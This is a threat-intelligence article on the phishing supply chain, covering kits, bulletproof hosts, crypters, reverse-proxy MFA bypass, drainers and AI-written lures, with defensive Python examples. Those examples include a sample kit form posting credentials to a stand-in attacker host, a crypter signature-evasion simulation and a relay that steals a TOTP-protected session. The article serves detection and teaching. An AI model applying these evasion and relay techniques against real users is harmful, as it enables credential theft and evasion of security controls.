Zero to Hero of Phishing: Modern Phishing Attacks by Leveraging Dark Web Tools and AI


“An ounce of prevention is worth a pound of cure” holds true in cybersecurity. Thanks to the wide availability of phishing kits and dark web markets, there has never been a more accessible, or riskier, route from beginner to expert. Phishing attacks are built from readily available resources such as phishing kits and templates, which allow even script kiddies to produce convincing lures, and the dark web supplies the stolen data that feeds those campaigns.

Novice to Expert: The Path

Phishing attacks frequently begin with novices using ready-made phishing kits that lower the technical barrier to entry. As they gain experience, these novices turn to dark web markets for more capable tooling: FUD crypters, reverse proxies, and RATs. With those in hand, they progress toward expert-level threat actors able to run intricate, carefully staged operations.

The Foundation: Phishing Kits & Templates

Phishing kits are prepackaged bundles that make launching a phishing attack easy. A kit typically contains everything the attacker needs to trick victims into disclosing sensitive information: cloned login pages, the server-side scripts that collect and forward whatever the victim submits, and email templates.

Phishing templates are the pre-designed web pages and emails in these kits that imitate a real brand, letting attackers run convincing phishing campaigns quickly and efficiently even with limited technical expertise.
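The tell-tale traits of a kit login page described above (a brand's look and feel, a password form, and a collector script that receives the credentials) can be checked mechanically. The following is an added example, not code from the original post or from any kit: it parses a fetched HTML page and flags a credential form that posts to a different host than the page itself, a plaintext post, and a page title that names a brand whose legitimate domain does not match the page host. The brand table, the page URLs and the two HTML snippets are constructed for the example.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class _PageCollector(HTMLParser):
    """Collects the <title> and every <form> (action plus input types) on a page."""

    def __init__(self):
        super().__init__()
        self.title = ""
        self.forms = []          # each: {"action": str, "inputs": [(type, name), ...]}
        self._form = None
        self._in_title = False

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "form":
            self._form = {"action": a.get("action", ""), "inputs": []}
            self.forms.append(self._form)
        elif tag == "input" and self._form is not None:
            self._form["inputs"].append((a.get("type", "text").lower(), a.get("name", "")))
        elif tag == "title":
            self._in_title = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._form = None
        elif tag == "title":
            self._in_title = False

    def handle_data(self, data):
        if self._in_title:
            self.title += data


def analyze_login_page(page_url: str, html: str, brands: dict[str, str]) -> list[str]:
    """Return finding codes for one fetched page. `brands` maps a brand keyword to its legitimate domain."""
    p = _PageCollector()
    p.feed(html)
    page_host = (urlsplit(page_url).hostname or "").lower()
    findings = []
    for form in p.forms:
        kinds = {t for t, _ in form["inputs"]}
        if "password" not in kinds:
            continue                                   # only credential forms matter here
        action = urljoin(page_url, form["action"])     # empty action means "post to this page"
        parts = urlsplit(action)
        action_host = (parts.hostname or "").lower()
        if action_host != page_host:
            findings.append(f"offsite_post:{action_host}")   # kit sends credentials to a collector
        if parts.scheme != "https":
            findings.append("plaintext_post")
    title = p.title.lower()
    for brand, legit in brands.items():
        if brand.lower() in title and not (page_host == legit or page_host.endswith("." + legit)):
            findings.append(f"brand_mismatch:{brand}")
    return findings


# Constructed brand/domain pair, a constructed kit page and a constructed legitimate page.
BRANDS = {"ExampleBank": "examplebank.com"}

KIT_URL = "https://secure-login.examplebank-verify.net/login.php"
KIT_HTML = """<html><head><title>Sign in | ExampleBank Online</title></head><body>
<form method="post" action="https://collector.example-attacker.org/post.php">
  <input type="email" name="user"><input type="password" name="pass">
  <input type="submit" value="Sign in"></form></body></html>"""

LEGIT_URL = "https://www.examplebank.com/login"
LEGIT_HTML = """<html><head><title>Sign in | ExampleBank Online</title></head><body>
<form method="post" action="/auth/login">
  <input type="email" name="user"><input type="password" name="pass"></form></body></html>"""
```

Run `analyze_login_page(KIT_URL, KIT_HTML, BRANDS)` and the kit page is flagged for posting off-site and for the brand mismatch, while the legitimate page returns no findings. Kits that post to the same host (the collector script is bundled with the page) are caught only by the brand check, so both heuristics are needed.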

With the rise of AI and easy access to dark web forums and marketplaces, it has become simple for script kiddies to interact with experienced threat actors and to learn from them or buy their toolkits on the way to becoming established threat actors themselves, which significantly lowers the barrier to entry for malicious activity.

Various Darkweb forum advertisements

Well-known forums and Telegram channels that sell or advertise phishing kits and templates are shown below. They are mentioned for research purposes only.

Setting the Stage: Hosting Providers on Marketplaces

Hosting and server providers are critical enablers of phishing. They supply the infrastructure for hosting fraudulent websites, sending phishing emails, and running the command-and-control (C2) servers that manage malware. Attackers use both legitimate providers and illicit bulletproof hosting providers to stay anonymous, avoid takedowns, and prolong their campaigns.

These services are accessible, affordable, and scalable, which lets even people with modest technical skills run sophisticated phishing campaigns. Countering them requires closer collaboration between security teams and hosting providers, better detection, and tighter monitoring of abuse.

Bolster researchers identified the following hosting and server providers while analyzing multiple phishing and scam URLs:

  1. Private Alps
  2. Alex Hosting
  3. EliteTeam
  4. FlyHosting
  5. FiberGrid
  6. Warez-Host
  7. Ultahost
  8. PSB-Hosting
  9. RDP.Monster
  10. Anon RDP

Various Darkweb forum advertisements

Fueling the Attack: Databases Available on Telegram and Dark Web

Databases sold on Telegram and the dark web are essential inputs for phishing attackers, giving them access to massive amounts of stolen personal and financial information. Frequently offered at low prices, these dumps contain email addresses, passwords, credit card details and similar data, which attackers use to build targeted phishing campaigns.


PII and Database advertised

Enhancing Stealth

Fully Undetectable (FUD) tools and crypters have made phishing attacks considerably stealthier. They are designed to slip the malware and malicious payloads delivered through phishing websites and kits past antivirus software and other detection systems. Note that FUD is a seller's claim rather than a property of the file: it usually means the sample evaded the scanners the seller tested against at the time of sale.

Crypters in particular encrypt or obfuscate the malicious code and wrap it in a small stub that decrypts it in memory at runtime, so the file on disk no longer matches signature-based detection while the payload stays fully functional once executed. This stealth is central to modern phishing tradecraft: it lets attackers gain access undetected, steal valuable information, and maintain persistence while staying under the radar of security controls.
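To make the signature-evasion point concrete, here is an added example that is not code from the original post or from any real crypter: a harmless, constructed text blob stands in for an implant, a fixed marker string in it stands in for the bytes an AV signature matches, and SHA-256 in counter mode stands in for the crypter's cipher. The example shows that the signature check fails on the encrypted file, that the same file still restores the original payload (which is what the stub does in memory), and that a byte-entropy heuristic still flags the encrypted blob. `SIGNATURE`, `PAYLOAD`, `SEED` and the 7.0 threshold are all assumptions for the example.

```python
import hashlib
import math

# Constructed stand-in for an implant body. The marker string plays the role of the bytes an AV
# signature matches; the text itself is inert.
SIGNATURE = b"beacon_cfg_v1"
PAYLOAD = (b"# stand-in implant script (constructed, does nothing)\n"
           b"host=c2.example-attacker.org port=8443 sleep=60 " + SIGNATURE + b"\n") * 40
SEED = b"crypter-key-2024"   # the crypter's key, normally embedded in the stub


def signature_hit(blob: bytes, signatures=(SIGNATURE,)) -> bool:
    """Static signature check: does any known byte pattern occur in the file as stored on disk?"""
    return any(sig in blob for sig in signatures)


def keystream(seed: bytes, length: int) -> bytes:
    """Deterministic pseudo-random keystream (SHA-256 in counter mode); stands in for the crypter's cipher."""
    out, counter = b"", 0
    while len(out) < length:
        out += hashlib.sha256(seed + counter.to_bytes(4, "big")).digest()
        counter += 1
    return out[:length]


def crypt(data: bytes, seed: bytes) -> bytes:
    """XOR with the keystream. The same call encrypts on the attacker's side and decrypts inside the stub."""
    return bytes(b ^ k for b, k in zip(data, keystream(seed, len(data))))


def shannon_entropy(blob: bytes) -> float:
    """Bits per byte. Near 8.0 means the bytes look random, as encrypted or packed sections do."""
    if not blob:
        return 0.0
    counts = [0] * 256
    for b in blob:
        counts[b] += 1
    n = len(blob)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def triage(blob: bytes, entropy_threshold: float = 7.0) -> dict:
    """What a scanner sees for one blob: the signature verdict plus an entropy heuristic."""
    ent = shannon_entropy(blob)
    return {"signature_hit": signature_hit(blob), "entropy": round(ent, 2), "high_entropy": ent >= entropy_threshold}


def demo() -> dict:
    wrapped = crypt(PAYLOAD, SEED)        # what lands on disk after the crypter
    restored = crypt(wrapped, SEED)       # what the stub reconstructs in memory before running it
    return {
        "on_disk_plain": triage(PAYLOAD),
        "on_disk_crypted": triage(wrapped),
        "in_memory_after_stub": triage(restored),
        "payload_intact": restored == PAYLOAD,
    }
```

`demo()` shows the signature hitting on the plain payload and on the in-memory copy but not on the crypted file, while the crypted file is the only one with high entropy. That is why defenders pair static signatures with entropy or packer heuristics and with memory scanning or emulation after the stub has run; note that entropy alone is a heuristic, since legitimately compressed or encrypted files score high as well.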

Crypters and FUD on sale

Expanding the Toolkit

InfoStealer

These malicious programs harvest sensitive information from infected devices: saved login credentials, browser session cookies, credit card numbers, and other personal data. Infostealers are frequently paired with phishing campaigns to increase the amount of data collected from each victim.

RATs

RATs give attackers unauthorized remote control of a victim's device. Once inside, the attacker can exfiltrate data, install additional malware, or use the device as a launchpad for further attacks. RATs are an effective tool in a phishing attacker's arsenal because they provide persistent access to infected systems.

Reverse Proxies

Attackers deploy reverse proxies to intercept and modify traffic between users and genuine websites. In a phishing attack the proxy sits between the victim and the legitimate site: the victim sees the real login flow, but every request and response passes through the attacker, who captures the password, relays the one-time code in real time, and keeps the authenticated session cookie the legitimate site issues. This is how reverse-proxy (adversary-in-the-middle) phishing defeats OTP- and push-based multi-factor authentication (MFA).
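The following is an added simulation, not code from the original post or from any phishing framework, of the exchange described above and of why origin-bound MFA resists it. A `RelyingParty` stands in for the genuine site, an `AitMProxy` on a lookalike domain relays each request upstream and records what passes through, and an `Authenticator` models a browser plus security key. The origins `https://login.examplebank.com` and `https://login.examp1ebank.com`, the test user and secrets are assumptions; the TOTP routine follows RFC 6238, while an HMAC over the hashed client data stands in for the ECDSA signature a real WebAuthn authenticator produces.

```python
import hashlib
import hmac
import json
import secrets
import struct


def totp(secret: bytes, now: int, step: int = 30, digits: int = 6) -> str:
    """RFC 6238 TOTP (HMAC-SHA1) for the given Unix time."""
    counter = struct.pack(">Q", now // step)
    mac = hmac.new(secret, counter, hashlib.sha1).digest()
    off = mac[-1] & 0x0F
    code = (struct.unpack(">I", mac[off:off + 4])[0] & 0x7FFFFFFF) % (10 ** digits)
    return str(code).zfill(digits)


def _sign(key: bytes, client_data_json: str) -> str:
    # HMAC over sha256(clientDataJSON) stands in for the ECDSA signature of a real authenticator.
    return hmac.new(key, hashlib.sha256(client_data_json.encode()).digest(), hashlib.sha256).hexdigest()


class RelyingParty:
    """The genuine site (assumed origin). Offers password+TOTP and a WebAuthn-style login."""
    ORIGIN = "https://login.examplebank.com"

    def __init__(self):
        self.passwords = {"alice": "correct horse battery"}      # constructed test user
        self.totp_secrets = {"alice": b"12345678901234567890"}
        self.webauthn_keys = {}   # user -> authenticator key (stand-in for a registered public key)
        self.challenges = {}
        self.sessions = {}        # session token -> user

    def login_password_totp(self, user, password, code, now):
        if self.passwords.get(user) != password or code != totp(self.totp_secrets[user], now):
            return None
        return self._issue_session(user)

    def webauthn_challenge(self, user):
        self.challenges[user] = secrets.token_hex(16)
        return self.challenges[user]

    def webauthn_finish(self, user, client_data_json, signature):
        data = json.loads(client_data_json)
        challenge = self.challenges.pop(user, None)      # single use
        if data.get("origin") != self.ORIGIN:            # origin binding: the check the proxy cannot pass
            return None
        if data.get("challenge") != challenge:
            return None
        if not hmac.compare_digest(_sign(self.webauthn_keys[user], client_data_json), signature):
            return None
        return self._issue_session(user)

    def _issue_session(self, user):
        token = secrets.token_hex(16)
        self.sessions[token] = user
        return token


class Authenticator:
    """Browser plus security key: it signs the origin the browser is actually on, whatever the page claims."""
    def __init__(self, key):
        self.key = key

    def get_assertion(self, origin, challenge):
        cdj = json.dumps({"type": "webauthn.get", "challenge": challenge, "origin": origin})
        return cdj, _sign(self.key, cdj)


class AitMProxy:
    """Phishing reverse proxy on an assumed lookalike domain: relays traffic to the real site and logs it."""
    ORIGIN = "https://login.examp1ebank.com"

    def __init__(self, upstream):
        self.upstream = upstream
        self.loot = []

    def relay_password_login(self, user, password, code, now):
        token = self.upstream.login_password_totp(user, password, code, now)
        self.loot.append({"user": user, "password": password, "totp": code, "session": token})
        return token   # the victim is logged in and notices nothing; the attacker holds the same session

    def relay_webauthn(self, user, authenticator):
        challenge = self.upstream.webauthn_challenge(user)
        cdj, sig = authenticator.get_assertion(self.ORIGIN, challenge)   # signed for the proxy's origin
        return self.upstream.webauthn_finish(user, cdj, sig)


def run_demo(now=1_700_000_000):
    rp = RelyingParty()
    key = b"alice-security-key"
    rp.webauthn_keys["alice"] = key
    auth, proxy = Authenticator(key), AitMProxy(rp)
    code = totp(rp.totp_secrets["alice"], now)                  # the code the victim types into the proxy
    stolen = proxy.relay_password_login("alice", "correct horse battery", code, now)
    via_proxy = proxy.relay_webauthn("alice", auth)             # rejected: origin mismatch
    cdj, sig = auth.get_assertion(rp.ORIGIN, rp.webauthn_challenge("alice"))
    direct = rp.webauthn_finish("alice", cdj, sig)              # accepted: right origin, right challenge
    return {
        "totp_session_stolen": stolen is not None and rp.sessions.get(stolen) == "alice",
        "webauthn_via_proxy_ok": via_proxy is not None,
        "webauthn_direct_ok": direct is not None,
        "loot": proxy.loot,
    }
```

`run_demo()` returns a stolen, valid session for the password+TOTP login (the one-time code is simply forwarded within its validity window) and `False` for the WebAuthn login through the proxy, because the assertion names the lookalike origin. Real deployments also bind the session cookie to the client (device certificates, token binding or conditional access on device identity) so that a relayed cookie is worthless even when the first factor is phishable.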

Drainers

Drainers are tools built specifically to empty cryptocurrency wallets. As cryptocurrencies grew in popularity, so did specialized tooling for stealing digital assets. Drainers are usually distributed through phishing emails or fraudulent websites that lure users into disclosing their wallet credentials or seed phrases, or into approving a transaction that sends funds to the attacker's address.

Drainer collecting PII while impersonating the OpenSea brand

The AI Revolution: Malicious Use of AI and GPT Models

Cybercriminals use AI to automate and improve phishing, producing more convincing and sophisticated schemes. AI models can draft fluent lures, mirror a known contact's writing style, and even hold real-time conversations to talk victims into disclosing sensitive data.

GPT models, for instance, are being used to generate highly tailored phishing messages, which undermines detection systems that rely on the spelling mistakes, awkward phrasing, and reused templates of older campaigns.
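When the body text is fluent and unique, the signals that survive are the ones the model cannot write: the envelope and authentication headers. The following added example, not code from the original post, triages two constructed messages without looking at their body at all. It flags a Reply-To domain that differs from the From domain, a display name that invokes a brand whose legitimate domain does not match the sender domain, and SPF/DKIM/DMARC failures reported in the receiving server's Authentication-Results header. The brand table, domains and both messages are constructed for the example.

```python
import email
from email import policy
from email.utils import parseaddr

TRUSTED = {"ExampleBank": "examplebank.com"}   # constructed brand -> legitimate sending domain

# Constructed message 1: spoofed From, attacker-controlled Reply-To, failed authentication.
SPOOFED = """From: "ExampleBank Security" <alerts@examplebank.com>
Reply-To: verify-account@examplebank-support.net
To: alice@example.org
Subject: Action required: confirm your recent sign-in
Authentication-Results: mx.example.org; spf=fail smtp.mailfrom=examplebank.com; dkim=none; dmarc=fail header.from=examplebank.com

Hi Alice, we noticed a sign-in from a new device and need you to confirm it was you.
"""

# Constructed message 2: attacker owns a lookalike domain, so authentication passes; only the brand check fires.
LOOKALIKE = """From: "ExampleBank" <no-reply@examplebank-alerts.com>
To: alice@example.org
Subject: Your statement is ready
Authentication-Results: mx.example.org; spf=pass smtp.mailfrom=examplebank-alerts.com; dkim=pass header.d=examplebank-alerts.com; dmarc=pass header.from=examplebank-alerts.com

Hello Alice, your monthly statement is ready to view.
"""


def _domain(addr: str) -> str:
    return addr.rpartition("@")[2].lower()


def triage_headers(raw: str, trusted: dict[str, str]) -> list[str]:
    """Header-only checks that do not depend on how well the body is written."""
    msg = email.message_from_string(raw, policy=policy.default)
    findings = []
    from_name, from_addr = parseaddr(str(msg["From"]))
    from_dom = _domain(from_addr)
    reply_dom = _domain(parseaddr(str(msg.get("Reply-To", "")))[1])
    if reply_dom and reply_dom != from_dom:
        findings.append(f"reply_to_mismatch:{reply_dom}")       # replies are steered to the attacker
    for brand, legit in trusted.items():
        if brand.lower() in from_name.lower() and from_dom != legit and not from_dom.endswith("." + legit):
            findings.append(f"display_name_impersonation:{brand}")
    auth = str(msg.get("Authentication-Results", "")).lower()
    for mech in ("spf", "dkim", "dmarc"):
        if f"{mech}=fail" in auth:
            findings.append(f"{mech}_fail")
    return findings
```

`triage_headers(SPOOFED, TRUSTED)` reports the Reply-To mismatch plus the SPF and DMARC failures, and `triage_headers(LOOKALIKE, TRUSTED)` reports only the display-name impersonation, which is the one check left when the attacker registers and fully authenticates a lookalike domain. The Authentication-Results header is trustworthy only when it was added by your own receiving MTA; strip any copy that arrives from outside before relying on it.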

Malicious version of GPT
Side-by-side comparison of the responses from GPT and from a jailbroken/malicious GPT

Exploiting Vulnerabilities: The Rise of Zero-Click Attacks

Zero-click attacks are quickly becoming one of the most significant cybersecurity threats. Unlike typical phishing, they exploit software vulnerabilities without any user interaction, letting attackers compromise devices silently.

Once the vulnerability is exploited, attackers can take control of the device, install malware, and steal sensitive data without the victim clicking a link or opening an attachment. That stealth makes these attacks extremely hard to detect and prevent.

A notable example is CVE-2024-30103, a remote code execution vulnerability in Microsoft Outlook patched in June 2024 that illustrates the risk posed by zero-click threats. A specially crafted email can trigger code execution when the message is opened or rendered in the preview pane, with no link clicked and no attachment run. Because the flaw lies in how the message itself is processed, the victim's device can be compromised as soon as the mail client handles it.

Mitigation Strategies

  • Provide security awareness training regularly to employees, clients, and other users.
  • Use modern threat detection tools that apply AI and machine learning to incoming traffic and flag threats early, before a user is involved.
  • Use MFA, preferring phishing-resistant methods (FIDO2/WebAuthn), together with biometric verification where available.
  • Never respond to, or hand sensitive credentials over to, unsolicited emails, links, phone calls, or messages. Stay alert when visiting unfamiliar websites or social media profiles.
  • Adopt a zero-trust architecture with continuous verification of users and devices.
  • Apply software updates and server patches as soon as they are available to close known vulnerabilities.
  • Encrypt all communications and sensitive data.
  • Collaborate with hosting providers so that phishing sites are taken down quickly.

Conclusion

Phishing is no longer limited to simple social engineering; it has grown into a complex, multi-layered attack chain that combines dark web tooling, AI, and evasive malware. The availability of phishing kits and advanced tools has made it easier than ever for script kiddies and novices to build up their capabilities.

To combat these risks, businesses and individuals must stay ahead of the curve with proactive security measures, training, and continuous monitoring. Only by remaining vigilant and proactive can we defend effectively against a constantly shifting threat landscape.